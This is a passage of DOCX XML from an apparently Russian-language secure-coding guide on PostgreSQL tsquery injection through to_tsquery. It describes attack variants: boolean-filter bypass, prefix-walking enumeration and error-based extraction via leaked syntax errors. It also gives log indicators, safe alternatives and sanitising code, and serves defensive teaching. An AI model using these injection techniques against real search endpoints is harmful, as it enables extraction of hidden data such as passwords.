          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ERROR: syntax error in tsquery: "admin &amp;"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">LINE 4:   ... WHERE search_vector @@ to_tsquery('english', 'admin &amp;') AND ...</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HTTP-500 с full SQL текстом и leaked input. Это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">точка входа для error-based extraction</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (см. 3.15.4 — там показано, как через concat нагружать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любым SQL-subquery, который вернёт password или другой target).</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Variant A — обход boolean-фильтрации (читать данные, которые приложение пытается скрыть через AND-conditions). Variant B — content enumeration через prefix-walking. Variant C — error-based information leak через syntax error (полная цепочка extraction в 3.15.4).</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запросы </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">to_tsquery(..., '... |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 '!...')</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 '...:*')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — нетипичные operators от обычного user-search endpoint.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log_min_messages = error</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: множественные </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">syntax error in tsquery</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> от одного IP — индикатор Variant C или fuzzing parser-а.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HTTP access-log: query parameter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&lt;-&gt;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критичные signal-characters tsquery operator-языка.</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to_tsquery(text)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в PostgreSQL — функция, которая </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">парсит full operator language</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Документация (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Text Search Functions and Operators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parses and produces a tsquery value from query, which can include single tokens... operators (&amp; for AND, | for OR, ! for NOT, and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;-&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for FOLLOWED BY), and parentheses."*</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намеренный design</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: tsquery — это полный язык, и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его парсер. Разработчик, передающий user-input в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делает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">эквивалент `eval`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для текстового search-языка. Bind-параметр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защищает SQL-уровень (no quote-escape), но передаваемое значение </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">разбирается tsquery-парсером</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> как code.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Защита — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">использовать функцию, которая НЕ парсит operators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plainto_tsquery(text)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — treats input as plain text, ignores all operators, AND-аются все термины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phraseto_tsquery(text)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — то же, но термины должны идти подряд (phrase search)</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websearch_to_tsquery(text)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — поддерживает Google-style syntax (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">"phrase"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-exclude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 но в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">predictable subset</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, который не позволяет syntax-error attack</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Подробное сравнение и migration pattern — в 3.15.3.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Альтернативный путь — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">pre-process input до `to_tsquery`</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def safe_tsquery_input(q: str) -&gt; str:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # Удалить operator-characters, оставить только слова и пробелы</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    cleaned = re.sub(r"[&amp;|!&lt;&gt;():*]", " ", q)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # Превратить пробелы в &amp; — AND по всем словам</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    tokens = [t for t in cleaned.split() if t]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    return " &amp; ".join(tokens)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">это reinvention `plainto_tsquery`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — лучше просто использовать встроенную функцию.</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с FTS (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">tsquery</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> появился в PG 8.3, 2008).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EXECUTE-доступ к эндпоинту.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Драйвер:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> любой — bind-параметр работает одинаково.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to_tsquery(:q)</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to_tsquery('lang', :q)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — user-input передаётся в parsing-функцию. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">plainto_tsquery(:q)</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phraseto_tsquery(:q)</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websearch_to_tsquery(:q)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — защищённые варианты, не 3.15.2.</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стандартная функция, используется когда </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">сам разработчик</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> конструирует query-string с operators (например, для advanced search-UI с явными boolean-toggle-кнопками):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># Шаблон 1: построение tsquery server-side из validated tokens</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">def build_tsquery(terms: list[str], op: str = "AND") -&gt; str:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # terms — уже validated tokens, op — Literal["AND", "OR"]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    sep = " &amp; " if op == "AND" else " | "</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    return sep.join(quote_tsquery_term(t) for t in terms)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quote_tsquery_term(t: str) -&gt; str:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # Удалить operator-chars из каждого term + escape</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    return "'" + re.sub(r"[&amp;|!&lt;&gt;():*']", "", t) +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@router.get("/articles/search")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search_articles(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    terms: list[str] = Query([]),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    op: Literal["AND", "OR"] = Query("AND"),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if not terms:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        return []</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    tsq = build_tsquery(terms, op)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    query = text("SELECT ... WHERE search_vector @@ to_tsquery('english', :q)")</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{"q": tsq})</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    return [...]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">terms</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — список отдельных tokens, не free-form. Operators (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">AND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 — Literal, валидируется на уровне routing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Для простого "Google-like" search-UI —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(см. 3.15.3) предпочтительнее, потому что user-syntax restricted в безопасный subset.</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to_tsquery(...:var)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> с bind-параметром, без сопровождающего pre-processing функции. В Python regex: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
